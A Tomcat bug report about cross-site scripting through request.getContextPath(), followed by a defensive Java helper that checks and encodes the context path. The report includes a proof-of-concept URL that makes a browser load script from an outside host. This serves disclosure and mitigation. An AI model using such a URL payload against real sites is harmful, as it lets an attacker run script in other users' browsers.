https://bz.apache.org/bugzilla/show_bug.cgi?id=65895
Bug ID: 65895
Summary: getContextPath() might introduce an XSS (cross-site)
Product: Tomcat 9
Version: 9.0.58
Hardware: PC
OS: Mac OS X 10.1
Status: NEW
Severity: normal
Priority: P2
Component: Catalina
Assignee: dev@tomcat.apache.org
Reporter: hawkc...@potix.com
Target Milestone: -----

# steps to reproduce

1. you create a jsp page to include a js with the context path:

   <script src="<%=request.getContextPath() %>/import.js"></script>

2. visit the URL below:

   localhost:8080//ptst.io/xsspoc?/..;/myapp/contextpath.jsp

   (assuming "myapp" is the application context path)

# Current result

a browser will load the cross-site script ptst.io/xsspoc

# Expected result

doesn't load ptst.io/xsspoc

# Other information

* I'm not sure it's a bug or not, welcome any input
* someone mentioned this issue: https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html
* I have tried this on tomcat 7, 8, 9, all have the same issue
* tomcat maven plugin doesn't have this issue

  <plugin>
    <groupId>org.apache.tomcat.maven</groupId>
    <artifactId>tomcat7-maven-plugin</artifactId>
    <version>2.2</version>
    <configuration>
      <port>8080</port>
      <path>/${project.artifactId}</path>
    </configuration>
  </plugin>

* jetty 9 doesn't have this issue.
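An application-side mitigation for the pattern in the report, added here as an illustration and not code from the reporter or from Tomcat: instead of echoing `request.getContextPath()` (which is derived from the request URI) straight into the page, compare it with the path the application was actually deployed under (`ServletContext.getContextPath()`, which is fixed at deployment) and fall back to the deployed path when they differ, then attribute-encode the result. The class and method names `ContextPathGuard`, `safeContextPath` and `attr` are hypothetical; only the standard Servlet API is assumed.

```java
import javax.servlet.http.HttpServletRequest;
import java.util.regex.Pattern;

/** Hypothetical helper; not part of Tomcat or of the bug report. */
public final class ContextPathGuard {

    // Allowlist shape for a context path: empty (ROOT) or "/segment" parts made
    // of unreserved characters. "//", ";", "?", "\" and ".." can never match.
    private static final Pattern SAFE = Pattern.compile("(?:/[A-Za-z0-9._~-]+)*");

    private ContextPathGuard() {}

    /**
     * Returns the context path to embed in HTML. The request-derived value is
     * used only when it is exactly the deployed path and has the expected shape;
     * otherwise the deployed path wins, so the request URI cannot steer the
     * value that ends up inside <script src="...">.
     */
    public static String safeContextPath(HttpServletRequest req) {
        String deployed = req.getServletContext().getContextPath(); // Servlet 3.0+
        String fromRequest = req.getContextPath();
        if (fromRequest != null
                && fromRequest.equals(deployed)
                && SAFE.matcher(fromRequest).matches()) {
            return fromRequest;
        }
        return deployed;
    }

    /** Minimal HTML attribute encoding for values placed inside a quoted attribute. */
    public static String attr(String s) {
        StringBuilder out = new StringBuilder(s.length());
        for (char c : s.toCharArray()) {
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }
}
```

In the JSP from the report the include line would then read `<script src="<%= ContextPathGuard.attr(ContextPathGuard.safeContextPath(request)) %>/import.js"></script>`, so the emitted prefix is always the deployed path (`/myapp` in the reporter's setup) regardless of how the request URI was written.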